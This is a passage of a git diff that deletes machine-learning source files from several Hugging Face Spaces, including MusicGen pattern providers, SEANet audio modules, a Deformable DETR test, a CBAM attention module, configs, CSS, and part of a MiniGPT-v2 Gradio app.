get_pattern(self, timesteps: int) -> Pattern: - """Builds pattern for delay across codebooks. 
-
-        Args:
-            timesteps (int): Total number of timesteps.
-        """
-        # the PatternLayout is built as a tuple of sequence position and list of coordinates
-        # so that it can be reordered properly given the required delay between codebooks of given timesteps
-        indexed_out: list = [(-1, [])]
-        max_timesteps = timesteps + self.max_delay
-        for t in range(max_timesteps):
-            # for each timestep, we unroll the flattened codebooks,
-            # emitting the sequence step with the corresponding delay
-            for step in range(self._num_inner_steps):
-                if step in self._flattened_codebooks:
-                    # we have codebooks at this virtual step to emit
-                    step_codebooks = self._flattened_codebooks[step]
-                    t_for_q = t + step_codebooks.delay
-                    coords = [LayoutCoord(t, q) for q in step_codebooks.codebooks]
-                    if t_for_q < max_timesteps and t < max_timesteps:
-                        indexed_out.append((t_for_q, coords))
-                else:
-                    # there is no codebook in this virtual step so we emit an empty list
-                    indexed_out.append((t, []))
-        out = [coords for _, coords in sorted(indexed_out)]
-        return Pattern(out, n_q=self.n_q, timesteps=timesteps)
-
-
-class VALLEPattern(CodebooksPatternProvider):
-    """Almost VALL-E style pattern. We further allow some delays for the
-    codebooks other than the first one.
-
-    Args:
-        n_q (int): Number of codebooks.
-        delays (Optional[List[int]]): Delay for each of the codebooks.
-            If delays are not defined, each codebook is delayed by 1 compared to the previous one.
- """ - def __init__(self, n_q: int, delays: tp.Optional[tp.List[int]] = None): - super().__init__(n_q) - if delays is None: - delays = [0] * (n_q - 1) - self.delays = delays - assert len(self.delays) == self.n_q - 1 - assert sorted(self.delays) == self.delays - - def get_pattern(self, timesteps: int) -> Pattern: - out: PatternLayout = [[]] - for t in range(timesteps): - out.append([LayoutCoord(t, 0)]) - max_delay = max(self.delays) - for t in range(timesteps + max_delay): - v = [] - for q, delay in enumerate(self.delays): - t_for_q = t - delay - if t_for_q >= 0: - v.append(LayoutCoord(t_for_q, q + 1)) - out.append(v) - return Pattern(out, n_q=self.n_q, timesteps=timesteps) - - -class MusicLMPattern(CodebooksPatternProvider): - """Almost MusicLM style pattern. This is equivalent to full flattening - but in a different order. - - Args: - n_q (int): Number of codebooks. - group_by (int): Number of codebooks to group together. - """ - def __init__(self, n_q: int, group_by: int = 2): - super().__init__(n_q) - self.group_by = group_by - - def get_pattern(self, timesteps: int) -> Pattern: - out: PatternLayout = [[]] - for offset in range(0, self.n_q, self.group_by): - for t in range(timesteps): - for q in range(offset, offset + self.group_by): - out.append([LayoutCoord(t, q)]) - return Pattern(out, n_q=self.n_q, timesteps=timesteps) diff --git a/spaces/Suniilkumaar/MusicGen-updated/audiocraft/modules/seanet.py b/spaces/Suniilkumaar/MusicGen-updated/audiocraft/modules/seanet.py deleted file mode 100644 index 3e5998e9153afb6e68ea410d565e00ea835db248..0000000000000000000000000000000000000000 --- a/spaces/Suniilkumaar/MusicGen-updated/audiocraft/modules/seanet.py +++ /dev/null @@ -1,258 +0,0 @@ -# Copyright (c) Meta Platforms, Inc. and affiliates. -# All rights reserved. -# -# This source code is licensed under the license found in the -# LICENSE file in the root directory of this source tree. 
- -import typing as tp - -import numpy as np -import torch.nn as nn - -from .conv import StreamableConv1d, StreamableConvTranspose1d -from .lstm import StreamableLSTM - - -class SEANetResnetBlock(nn.Module): - """Residual block from SEANet model. - - Args: - dim (int): Dimension of the input/output. - kernel_sizes (list): List of kernel sizes for the convolutions. - dilations (list): List of dilations for the convolutions. - activation (str): Activation function. - activation_params (dict): Parameters to provide to the activation function. - norm (str): Normalization method. - norm_params (dict): Parameters to provide to the underlying normalization used along with the convolution. - causal (bool): Whether to use fully causal convolution. - pad_mode (str): Padding mode for the convolutions. - compress (int): Reduced dimensionality in residual branches (from Demucs v3). - true_skip (bool): Whether to use true skip connection or a simple - (streamable) convolution as the skip connection. - """ - def __init__(self, dim: int, kernel_sizes: tp.List[int] = [3, 1], dilations: tp.List[int] = [1, 1], - activation: str = 'ELU', activation_params: dict = {'alpha': 1.0}, - norm: str = 'none', norm_params: tp.Dict[str, tp.Any] = {}, causal: bool = False, - pad_mode: str = 'reflect', compress: int = 2, true_skip: bool = True): - super().__init__() - assert len(kernel_sizes) == len(dilations), 'Number of kernel sizes should match number of dilations' - act = getattr(nn, activation) - hidden = dim // compress - block = [] - for i, (kernel_size, dilation) in enumerate(zip(kernel_sizes, dilations)): - in_chs = dim if i == 0 else hidden - out_chs = dim if i == len(kernel_sizes) - 1 else hidden - block += [ - act(**activation_params), - StreamableConv1d(in_chs, out_chs, kernel_size=kernel_size, dilation=dilation, - norm=norm, norm_kwargs=norm_params, - causal=causal, pad_mode=pad_mode), - ] - self.block = nn.Sequential(*block) - self.shortcut: nn.Module - if true_skip: - self.shortcut 
= nn.Identity()
- else:
- self.shortcut = StreamableConv1d(dim, dim, kernel_size=1, norm=norm, norm_kwargs=norm_params,
- causal=causal, pad_mode=pad_mode)
-
- def forward(self, x):
- return self.shortcut(x) + self.block(x)
-
-
-class SEANetEncoder(nn.Module):
- """SEANet encoder.
-
- Args:
- channels (int): Audio channels.
- dimension (int): Intermediate representation dimension.
- n_filters (int): Base width for the model.
- n_residual_layers (int): Number of residual layers.
- ratios (Sequence[int]): kernel size and stride ratios. The encoder uses downsampling ratios instead of
- upsampling ratios, hence it will use the ratios in the reverse order to the ones specified here
- that must match the decoder order. We use the decoder order as some models may only employ the decoder.
- activation (str): Activation function.
- activation_params (dict): Parameters to provide to the activation function.
- norm (str): Normalization method.
- norm_params (dict): Parameters to provide to the underlying normalization used along with the convolution.
- kernel_size (int): Kernel size for the initial convolution.
- last_kernel_size (int): Kernel size for the final convolution.
- residual_kernel_size (int): Kernel size for the residual layers.
- dilation_base (int): How much to increase the dilation with each layer.
- causal (bool): Whether to use fully causal convolution.
- pad_mode (str): Padding mode for the convolutions.
- true_skip (bool): Whether to use true skip connection or a simple
- (streamable) convolution as the skip connection in the residual network blocks.
- compress (int): Reduced dimensionality in residual branches (from Demucs v3).
- lstm (int): Number of LSTM layers at the end of the encoder.
- disable_norm_outer_blocks (int): Number of blocks for which we don't apply norm.
- For the encoder, it corresponds to the N first blocks.
- """ - def __init__(self, channels: int = 1, dimension: int = 128, n_filters: int = 32, n_residual_layers: int = 3, - ratios: tp.List[int] = [8, 5, 4, 2], activation: str = 'ELU', activation_params: dict = {'alpha': 1.0}, - norm: str = 'none', norm_params: tp.Dict[str, tp.Any] = {}, kernel_size: int = 7, - last_kernel_size: int = 7, residual_kernel_size: int = 3, dilation_base: int = 2, causal: bool = False, - pad_mode: str = 'reflect', true_skip: bool = True, compress: int = 2, lstm: int = 0, - disable_norm_outer_blocks: int = 0): - super().__init__() - self.channels = channels - self.dimension = dimension - self.n_filters = n_filters - self.ratios = list(reversed(ratios)) - del ratios - self.n_residual_layers = n_residual_layers - self.hop_length = np.prod(self.ratios) - self.n_blocks = len(self.ratios) + 2 # first and last conv + residual blocks - self.disable_norm_outer_blocks = disable_norm_outer_blocks - assert self.disable_norm_outer_blocks >= 0 and self.disable_norm_outer_blocks <= self.n_blocks, \ - "Number of blocks for which to disable norm is invalid." \ - "It should be lower or equal to the actual number of blocks in the network and greater or equal to 0." 
- - act = getattr(nn, activation) - mult = 1 - model: tp.List[nn.Module] = [ - StreamableConv1d(channels, mult * n_filters, kernel_size, - norm='none' if self.disable_norm_outer_blocks >= 1 else norm, - norm_kwargs=norm_params, causal=causal, pad_mode=pad_mode) - ] - # Downsample to raw audio scale - for i, ratio in enumerate(self.ratios): - block_norm = 'none' if self.disable_norm_outer_blocks >= i + 2 else norm - # Add residual layers - for j in range(n_residual_layers): - model += [ - SEANetResnetBlock(mult * n_filters, kernel_sizes=[residual_kernel_size, 1], - dilations=[dilation_base ** j, 1], - norm=block_norm, norm_params=norm_params, - activation=activation, activation_params=activation_params, - causal=causal, pad_mode=pad_mode, compress=compress, true_skip=true_skip)] - - # Add downsampling layers - model += [ - act(**activation_params), - StreamableConv1d(mult * n_filters, mult * n_filters * 2, - kernel_size=ratio * 2, stride=ratio, - norm=block_norm, norm_kwargs=norm_params, - causal=causal, pad_mode=pad_mode), - ] - mult *= 2 - - if lstm: - model += [StreamableLSTM(mult * n_filters, num_layers=lstm)] - - model += [ - act(**activation_params), - StreamableConv1d(mult * n_filters, dimension, last_kernel_size, - norm='none' if self.disable_norm_outer_blocks == self.n_blocks else norm, - norm_kwargs=norm_params, causal=causal, pad_mode=pad_mode) - ] - - self.model = nn.Sequential(*model) - - def forward(self, x): - return self.model(x) - - -class SEANetDecoder(nn.Module): - """SEANet decoder. - - Args: - channels (int): Audio channels. - dimension (int): Intermediate representation dimension. - n_filters (int): Base width for the model. - n_residual_layers (int): nb of residual layers. - ratios (Sequence[int]): kernel size and stride ratios. - activation (str): Activation function. - activation_params (dict): Parameters to provide to the activation function. - final_activation (str): Final activation function after all convolutions. 
- final_activation_params (dict): Parameters to provide to the activation function.
- norm (str): Normalization method.
- norm_params (dict): Parameters to provide to the underlying normalization used along with the convolution.
- kernel_size (int): Kernel size for the initial convolution.
- last_kernel_size (int): Kernel size for the final convolution.
- residual_kernel_size (int): Kernel size for the residual layers.
- dilation_base (int): How much to increase the dilation with each layer.
- causal (bool): Whether to use fully causal convolution.
- pad_mode (str): Padding mode for the convolutions.
- true_skip (bool): Whether to use true skip connection or a simple
- (streamable) convolution as the skip connection in the residual network blocks.
- compress (int): Reduced dimensionality in residual branches (from Demucs v3).
- lstm (int): Number of LSTM layers at the end of the decoder.
- disable_norm_outer_blocks (int): Number of blocks for which we don't apply norm.
- For the decoder, it corresponds to the N last blocks.
- trim_right_ratio (float): Ratio for trimming at the right of the transposed convolution under the causal setup.
- If equal to 1.0, it means that all the trimming is done at the right.
- """ - def __init__(self, channels: int = 1, dimension: int = 128, n_filters: int = 32, n_residual_layers: int = 3, - ratios: tp.List[int] = [8, 5, 4, 2], activation: str = 'ELU', activation_params: dict = {'alpha': 1.0}, - final_activation: tp.Optional[str] = None, final_activation_params: tp.Optional[dict] = None, - norm: str = 'none', norm_params: tp.Dict[str, tp.Any] = {}, kernel_size: int = 7, - last_kernel_size: int = 7, residual_kernel_size: int = 3, dilation_base: int = 2, causal: bool = False, - pad_mode: str = 'reflect', true_skip: bool = True, compress: int = 2, lstm: int = 0, - disable_norm_outer_blocks: int = 0, trim_right_ratio: float = 1.0): - super().__init__() - self.dimension = dimension - self.channels = channels - self.n_filters = n_filters - self.ratios = ratios - del ratios - self.n_residual_layers = n_residual_layers - self.hop_length = np.prod(self.ratios) - self.n_blocks = len(self.ratios) + 2 # first and last conv + residual blocks - self.disable_norm_outer_blocks = disable_norm_outer_blocks - assert self.disable_norm_outer_blocks >= 0 and self.disable_norm_outer_blocks <= self.n_blocks, \ - "Number of blocks for which to disable norm is invalid." \ - "It should be lower or equal to the actual number of blocks in the network and greater or equal to 0." 
- - act = getattr(nn, activation) - mult = int(2 ** len(self.ratios)) - model: tp.List[nn.Module] = [ - StreamableConv1d(dimension, mult * n_filters, kernel_size, - norm='none' if self.disable_norm_outer_blocks == self.n_blocks else norm, - norm_kwargs=norm_params, causal=causal, pad_mode=pad_mode) - ] - - if lstm: - model += [StreamableLSTM(mult * n_filters, num_layers=lstm)] - - # Upsample to raw audio scale - for i, ratio in enumerate(self.ratios): - block_norm = 'none' if self.disable_norm_outer_blocks >= self.n_blocks - (i + 1) else norm - # Add upsampling layers - model += [ - act(**activation_params), - StreamableConvTranspose1d(mult * n_filters, mult * n_filters // 2, - kernel_size=ratio * 2, stride=ratio, - norm=block_norm, norm_kwargs=norm_params, - causal=causal, trim_right_ratio=trim_right_ratio), - ] - # Add residual layers - for j in range(n_residual_layers): - model += [ - SEANetResnetBlock(mult * n_filters // 2, kernel_sizes=[residual_kernel_size, 1], - dilations=[dilation_base ** j, 1], - activation=activation, activation_params=activation_params, - norm=block_norm, norm_params=norm_params, causal=causal, - pad_mode=pad_mode, compress=compress, true_skip=true_skip)] - - mult //= 2 - - # Add final layers - model += [ - act(**activation_params), - StreamableConv1d(n_filters, channels, last_kernel_size, - norm='none' if self.disable_norm_outer_blocks >= 1 else norm, - norm_kwargs=norm_params, causal=causal, pad_mode=pad_mode) - ] - # Add optional final activation to decoder (eg. 
tanh) - if final_activation is not None: - final_act = getattr(nn, final_activation) - final_activation_params = final_activation_params or {} - model += [ - final_act(**final_activation_params) - ] - self.model = nn.Sequential(*model) - - def forward(self, z): - y = self.model(z) - return y diff --git a/spaces/Superlang/ImageProcessor/annotator/oneformer/oneformer/modeling/pixel_decoder/ops/test.py b/spaces/Superlang/ImageProcessor/annotator/oneformer/oneformer/modeling/pixel_decoder/ops/test.py deleted file mode 100644 index 6e1b545459f6fd3235767e721eb5a1090ae14bef..0000000000000000000000000000000000000000 --- a/spaces/Superlang/ImageProcessor/annotator/oneformer/oneformer/modeling/pixel_decoder/ops/test.py +++ /dev/null @@ -1,92 +0,0 @@ -# ------------------------------------------------------------------------------------------------ -# Deformable DETR -# Copyright (c) 2020 SenseTime. All Rights Reserved. -# Licensed under the Apache License, Version 2.0 [see LICENSE for details] -# ------------------------------------------------------------------------------------------------ -# Modified from https://github.com/chengdazhi/Deformable-Convolution-V2-PyTorch/tree/pytorch_1.0.0 -# ------------------------------------------------------------------------------------------------ - -# Copyright (c) Facebook, Inc. and its affiliates. 
-# Modified by Bowen Cheng from https://github.com/fundamentalvision/Deformable-DETR - -from __future__ import absolute_import -from __future__ import print_function -from __future__ import division - -import time -import torch -import torch.nn as nn -from torch.autograd import gradcheck - -from functions.ms_deform_attn_func import MSDeformAttnFunction, ms_deform_attn_core_pytorch - - -N, M, D = 1, 2, 2 -Lq, L, P = 2, 2, 2 -shapes = torch.as_tensor([(6, 4), (3, 2)], dtype=torch.long).cuda() -level_start_index = torch.cat((shapes.new_zeros((1, )), shapes.prod(1).cumsum(0)[:-1])) -S = sum([(H*W).item() for H, W in shapes]) - - -torch.manual_seed(3) - - -@torch.no_grad() -def check_forward_equal_with_pytorch_double(): - value = torch.rand(N, S, M, D).cuda() * 0.01 - sampling_locations = torch.rand(N, Lq, M, L, P, 2).cuda() - attention_weights = torch.rand(N, Lq, M, L, P).cuda() + 1e-5 - attention_weights /= attention_weights.sum(-1, keepdim=True).sum(-2, keepdim=True) - im2col_step = 2 - output_pytorch = ms_deform_attn_core_pytorch(value.double(), shapes, sampling_locations.double(), attention_weights.double()).detach().cpu() - output_cuda = MSDeformAttnFunction.apply(value.double(), shapes, level_start_index, sampling_locations.double(), attention_weights.double(), im2col_step).detach().cpu() - fwdok = torch.allclose(output_cuda, output_pytorch) - max_abs_err = (output_cuda - output_pytorch).abs().max() - max_rel_err = ((output_cuda - output_pytorch).abs() / output_pytorch.abs()).max() - - print(f'* {fwdok} check_forward_equal_with_pytorch_double: max_abs_err {max_abs_err:.2e} max_rel_err {max_rel_err:.2e}') - - -@torch.no_grad() -def check_forward_equal_with_pytorch_float(): - value = torch.rand(N, S, M, D).cuda() * 0.01 - sampling_locations = torch.rand(N, Lq, M, L, P, 2).cuda() - attention_weights = torch.rand(N, Lq, M, L, P).cuda() + 1e-5 - attention_weights /= attention_weights.sum(-1, keepdim=True).sum(-2, keepdim=True) - im2col_step = 2 - output_pytorch = 
ms_deform_attn_core_pytorch(value, shapes, sampling_locations, attention_weights).detach().cpu() - output_cuda = MSDeformAttnFunction.apply(value, shapes, level_start_index, sampling_locations, attention_weights, im2col_step).detach().cpu() - fwdok = torch.allclose(output_cuda, output_pytorch, rtol=1e-2, atol=1e-3) - max_abs_err = (output_cuda - output_pytorch).abs().max() - max_rel_err = ((output_cuda - output_pytorch).abs() / output_pytorch.abs()).max() - - print(f'* {fwdok} check_forward_equal_with_pytorch_float: max_abs_err {max_abs_err:.2e} max_rel_err {max_rel_err:.2e}') - - -def check_gradient_numerical(channels=4, grad_value=True, grad_sampling_loc=True, grad_attn_weight=True): - - value = torch.rand(N, S, M, channels).cuda() * 0.01 - sampling_locations = torch.rand(N, Lq, M, L, P, 2).cuda() - attention_weights = torch.rand(N, Lq, M, L, P).cuda() + 1e-5 - attention_weights /= attention_weights.sum(-1, keepdim=True).sum(-2, keepdim=True) - im2col_step = 2 - func = MSDeformAttnFunction.apply - - value.requires_grad = grad_value - sampling_locations.requires_grad = grad_sampling_loc - attention_weights.requires_grad = grad_attn_weight - - gradok = gradcheck(func, (value.double(), shapes, level_start_index, sampling_locations.double(), attention_weights.double(), im2col_step)) - - print(f'* {gradok} check_gradient_numerical(D={channels})') - - -if __name__ == '__main__': - check_forward_equal_with_pytorch_double() - check_forward_equal_with_pytorch_float() - - for channels in [30, 32, 64, 71, 1025, 2048, 3096]: - check_gradient_numerical(channels, True, True, True) - - - diff --git a/spaces/Superlang/ImageProcessor/annotator/uniformer/configs/_base_/models/upernet_r50.py b/spaces/Superlang/ImageProcessor/annotator/uniformer/configs/_base_/models/upernet_r50.py deleted file mode 100644 index 10974962fdd7136031fd06de1700f497d355ceaa..0000000000000000000000000000000000000000 --- 
a/spaces/Superlang/ImageProcessor/annotator/uniformer/configs/_base_/models/upernet_r50.py +++ /dev/null @@ -1,44 +0,0 @@ -# model settings -norm_cfg = dict(type='SyncBN', requires_grad=True) -model = dict( - type='EncoderDecoder', - pretrained='open-mmlab://resnet50_v1c', - backbone=dict( - type='ResNetV1c', - depth=50, - num_stages=4, - out_indices=(0, 1, 2, 3), - dilations=(1, 1, 1, 1), - strides=(1, 2, 2, 2), - norm_cfg=norm_cfg, - norm_eval=False, - style='pytorch', - contract_dilation=True), - decode_head=dict( - type='UPerHead', - in_channels=[256, 512, 1024, 2048], - in_index=[0, 1, 2, 3], - pool_scales=(1, 2, 3, 6), - channels=512, - dropout_ratio=0.1, - num_classes=19, - norm_cfg=norm_cfg, - align_corners=False, - loss_decode=dict( - type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0)), - auxiliary_head=dict( - type='FCNHead', - in_channels=1024, - in_index=2, - channels=256, - num_convs=1, - concat_input=False, - dropout_ratio=0.1, - num_classes=19, - norm_cfg=norm_cfg, - align_corners=False, - loss_decode=dict( - type='CrossEntropyLoss', use_sigmoid=False, loss_weight=0.4)), - # model training and testing settings - train_cfg=dict(), - test_cfg=dict(mode='whole')) diff --git a/spaces/ThirdEyeData/Next_Failure_Prediction/README.md b/spaces/ThirdEyeData/Next_Failure_Prediction/README.md deleted file mode 100644 index cb6657f9f3244df662cdeed3f6a99fcc94daf305..0000000000000000000000000000000000000000 --- a/spaces/ThirdEyeData/Next_Failure_Prediction/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: Next Failure Prediction -emoji: ⚡ -colorFrom: yellow -colorTo: blue -sdk: streamlit -sdk_version: 1.17.0 -app_file: app.py -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/ThomasSimonini/SmartRobot/README.md b/spaces/ThomasSimonini/SmartRobot/README.md deleted file mode 100644 index 
0a8d9bf847a4e027911ce85459dc22971396b381..0000000000000000000000000000000000000000 --- a/spaces/ThomasSimonini/SmartRobot/README.md +++ /dev/null @@ -1,10 +0,0 @@ ---- -title: SmartRobot -emoji: 🤖 -colorFrom: blue -colorTo: gray -sdk: static -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/ThunderJames/PhotoRealistic/style.css b/spaces/ThunderJames/PhotoRealistic/style.css deleted file mode 100644 index 114adf441e9032febb46bc056b2a8bb651075f0d..0000000000000000000000000000000000000000 --- a/spaces/ThunderJames/PhotoRealistic/style.css +++ /dev/null @@ -1,28 +0,0 @@ -body { - padding: 2rem; - font-family: -apple-system, BlinkMacSystemFont, "Arial", sans-serif; -} - -h1 { - font-size: 16px; - margin-top: 0; -} - -p { - color: rgb(107, 114, 128); - font-size: 15px; - margin-bottom: 10px; - margin-top: 5px; -} - -.card { - max-width: 620px; - margin: 0 auto; - padding: 16px; - border: 1px solid lightgray; - border-radius: 16px; -} - -.card p:last-child { - margin-bottom: 0; -} diff --git a/spaces/VIPLab/Track-Anything/tracker/model/cbam.py b/spaces/VIPLab/Track-Anything/tracker/model/cbam.py deleted file mode 100644 index 6423358429e2843b1f36ceb2bc1a485ea72b8eb4..0000000000000000000000000000000000000000 --- a/spaces/VIPLab/Track-Anything/tracker/model/cbam.py +++ /dev/null @@ -1,77 +0,0 @@ -# Modified from https://github.com/Jongchan/attention-module/blob/master/MODELS/cbam.py - -import torch -import torch.nn as nn -import torch.nn.functional as F - -class BasicConv(nn.Module): - def __init__(self, in_planes, out_planes, kernel_size, stride=1, padding=0, dilation=1, groups=1, bias=True): - super(BasicConv, self).__init__() - self.out_channels = out_planes - self.conv = nn.Conv2d(in_planes, out_planes, kernel_size=kernel_size, stride=stride, padding=padding, dilation=dilation, groups=groups, bias=bias) - - def forward(self, x): - x = self.conv(x) - return x - -class 
Flatten(nn.Module): - def forward(self, x): - return x.view(x.size(0), -1) - -class ChannelGate(nn.Module): - def __init__(self, gate_channels, reduction_ratio=16, pool_types=['avg', 'max']): - super(ChannelGate, self).__init__() - self.gate_channels = gate_channels - self.mlp = nn.Sequential( - Flatten(), - nn.Linear(gate_channels, gate_channels // reduction_ratio), - nn.ReLU(), - nn.Linear(gate_channels // reduction_ratio, gate_channels) - ) - self.pool_types = pool_types - def forward(self, x): - channel_att_sum = None - for pool_type in self.pool_types: - if pool_type=='avg': - avg_pool = F.avg_pool2d( x, (x.size(2), x.size(3)), stride=(x.size(2), x.size(3))) - channel_att_raw = self.mlp( avg_pool ) - elif pool_type=='max': - max_pool = F.max_pool2d( x, (x.size(2), x.size(3)), stride=(x.size(2), x.size(3))) - channel_att_raw = self.mlp( max_pool ) - - if channel_att_sum is None: - channel_att_sum = channel_att_raw - else: - channel_att_sum = channel_att_sum + channel_att_raw - - scale = torch.sigmoid( channel_att_sum ).unsqueeze(2).unsqueeze(3).expand_as(x) - return x * scale - -class ChannelPool(nn.Module): - def forward(self, x): - return torch.cat( (torch.max(x,1)[0].unsqueeze(1), torch.mean(x,1).unsqueeze(1)), dim=1 ) - -class SpatialGate(nn.Module): - def __init__(self): - super(SpatialGate, self).__init__() - kernel_size = 7 - self.compress = ChannelPool() - self.spatial = BasicConv(2, 1, kernel_size, stride=1, padding=(kernel_size-1) // 2) - def forward(self, x): - x_compress = self.compress(x) - x_out = self.spatial(x_compress) - scale = torch.sigmoid(x_out) # broadcasting - return x * scale - -class CBAM(nn.Module): - def __init__(self, gate_channels, reduction_ratio=16, pool_types=['avg', 'max'], no_spatial=False): - super(CBAM, self).__init__() - self.ChannelGate = ChannelGate(gate_channels, reduction_ratio, pool_types) - self.no_spatial=no_spatial - if not no_spatial: - self.SpatialGate = SpatialGate() - def forward(self, x): - x_out = 
self.ChannelGate(x) - if not self.no_spatial: - x_out = self.SpatialGate(x_out) - return x_out diff --git a/spaces/VickyKira/NASAGPT/client/js/change-language.js b/spaces/VickyKira/NASAGPT/client/js/change-language.js deleted file mode 100644 index ce87f6f60c7a9acca5e1902612930ef677f3fb65..0000000000000000000000000000000000000000 --- a/spaces/VickyKira/NASAGPT/client/js/change-language.js +++ /dev/null @@ -1,47 +0,0 @@ -document.addEventListener('DOMContentLoaded', fetchLanguages); - -async function fetchLanguages() { - try { - const [languagesResponse, currentLanguageResponse] = await Promise.all([ - fetch(`${url_prefix}/get-languages`), - fetch(`${url_prefix}/get-locale`) - ]); - - const languages = await languagesResponse.json(); - const currentLanguage = await currentLanguageResponse.text(); - - const languageSelect = document.getElementById('language'); - languages.forEach(lang => { - const option = document.createElement('option'); - option.value = lang; - option.textContent = lang; - languageSelect.appendChild(option); - }); - - const savedLanguage = localStorage.getItem("language") || currentLanguage; - setLanguageOnPageLoad(savedLanguage); - } catch (error) { - console.error("Failed to fetch languages or current language"); - } -} - -function setLanguageOnPageLoad(language) { - document.getElementById("language").value = language; -} - -function changeLanguage(lang) { - fetch(`${url_prefix}/change-language`, { - method: "POST", - headers: { - "Content-Type": "application/json", - }, - body: JSON.stringify({ language: lang }), - }).then((response) => { - if (response.ok) { - localStorage.setItem("language", lang); - location.reload(); - } else { - console.error("Failed to change language"); - } - }); -} diff --git a/spaces/Vision-CAIR/MiniGPT-v2/app.py b/spaces/Vision-CAIR/MiniGPT-v2/app.py deleted file mode 100644 index efc0b16e1155c0b415428013771ba1583a425062..0000000000000000000000000000000000000000 --- a/spaces/Vision-CAIR/MiniGPT-v2/app.py +++ 
/dev/null @@ -1,656 +0,0 @@ -import argparse -import os -import random -from collections import defaultdict - -import cv2 -import re - -import numpy as np -from PIL import Image -import torch -import html -import gradio as gr - -import torchvision.transforms as T -import torch.backends.cudnn as cudnn - -from minigpt4.common.config import Config - -from minigpt4.common.registry import registry -from minigpt4.conversation.conversation import Conversation, SeparatorStyle, Chat - -# imports modules for registration -from minigpt4.datasets.builders import * -from minigpt4.models import * -from minigpt4.processors import * -from minigpt4.runners import * -from minigpt4.tasks import * - -import warnings -warnings.filterwarnings("ignore") - -def parse_args(): - parser = argparse.ArgumentParser(description="Demo") - parser.add_argument("--cfg-path", default='eval_configs/minigptv2_eval.yaml', - help="path to configuration file.") - parser.add_argument("--gpu-id", type=int, default=0, help="specify the gpu to load the model.") - parser.add_argument( - "--options", - nargs="+", - help="override some settings in the used config, the key-value pair " - "in xxx=yyy format will be merged into config file (deprecate), " - "change to --cfg-options instead.", - ) - args = parser.parse_args() - return args - - -random.seed(42) -np.random.seed(42) -torch.manual_seed(42) - -cudnn.benchmark = False -cudnn.deterministic = True - -print('Initializing Chat') -args = parse_args() -cfg = Config(args) - -device = 'cuda:{}'.format(args.gpu_id) - -model_config = cfg.model_cfg -model_config.device_8bit = args.gpu_id -model_cls = registry.get_model_class(model_config.arch) -model = model_cls.from_config(model_config).to(device) -bounding_box_size = 100 - -vis_processor_cfg = cfg.datasets_cfg.cc_sbu_align.vis_processor.train -vis_processor = registry.get_processor_class(vis_processor_cfg.name).from_config(vis_processor_cfg) - -model = model.eval() - -CONV_VISION = Conversation( - system="", - 
roles=(r"[INST] ", r" [/INST]"), - messages=[], - offset=2, - sep_style=SeparatorStyle.SINGLE, - sep="", -) - - -def extract_substrings(string): - # first check if there is no-finished bracket - index = string.rfind('}') - if index != -1: - string = string[:index + 1] - - pattern = r'
<p>
    (.*?)\}(?!<)' - matches = re.findall(pattern, string) - substrings = [match for match in matches] - - return substrings - - -def is_overlapping(rect1, rect2): - x1, y1, x2, y2 = rect1 - x3, y3, x4, y4 = rect2 - return not (x2 < x3 or x1 > x4 or y2 < y3 or y1 > y4) - - -def computeIoU(bbox1, bbox2): - x1, y1, x2, y2 = bbox1 - x3, y3, x4, y4 = bbox2 - intersection_x1 = max(x1, x3) - intersection_y1 = max(y1, y3) - intersection_x2 = min(x2, x4) - intersection_y2 = min(y2, y4) - intersection_area = max(0, intersection_x2 - intersection_x1 + 1) * max(0, intersection_y2 - intersection_y1 + 1) - bbox1_area = (x2 - x1 + 1) * (y2 - y1 + 1) - bbox2_area = (x4 - x3 + 1) * (y4 - y3 + 1) - union_area = bbox1_area + bbox2_area - intersection_area - iou = intersection_area / union_area - return iou - - -def save_tmp_img(visual_img): - file_name = "".join([str(random.randint(0, 9)) for _ in range(5)]) + ".jpg" - file_path = "/tmp/gradio" + file_name - visual_img.save(file_path) - return file_path - - -def mask2bbox(mask): - if mask is None: - return '' - mask = mask.resize([100, 100], resample=Image.NEAREST) - mask = np.array(mask)[:, :, 0] - - rows = np.any(mask, axis=1) - cols = np.any(mask, axis=0) - - if rows.sum(): - # Get the top, bottom, left, and right boundaries - rmin, rmax = np.where(rows)[0][[0, -1]] - cmin, cmax = np.where(cols)[0][[0, -1]] - bbox = '{{<{}><{}><{}><{}>}}'.format(cmin, rmin, cmax, rmax) - else: - bbox = '' - - return bbox - - -def escape_markdown(text): - # List of Markdown special characters that need to be escaped - md_chars = ['<', '>'] - - # Escape each special character - for char in md_chars: - text = text.replace(char, '\\' + char) - - return text - - -def reverse_escape(text): - md_chars = ['\\<', '\\>'] - - for char in md_chars: - text = text.replace(char, char[1:]) - - return text - - -colors = [ - (255, 0, 0), - (0, 255, 0), - (0, 0, 255), - (210, 210, 0), - (255, 0, 255), - (0, 255, 255), - (114, 128, 250), - (0, 165, 255), - (0, 128, 
0), - (144, 238, 144), - (238, 238, 175), - (255, 191, 0), - (0, 128, 0), - (226, 43, 138), - (255, 0, 255), - (0, 215, 255), -] - -color_map = { - f"{color_id}": f"#{hex(color[2])[2:].zfill(2)}{hex(color[1])[2:].zfill(2)}{hex(color[0])[2:].zfill(2)}" for - color_id, color in enumerate(colors) -} - -used_colors = colors - - -def visualize_all_bbox_together(image, generation): - if image is None: - return None, '' - - generation = html.unescape(generation) - - image_width, image_height = image.size - image = image.resize([500, int(500 / image_width * image_height)]) - image_width, image_height = image.size - - string_list = extract_substrings(generation) - if string_list: # it is grounding or detection - mode = 'all' - entities = defaultdict(list) - i = 0 - j = 0 - for string in string_list: - try: - obj, string = string.split('

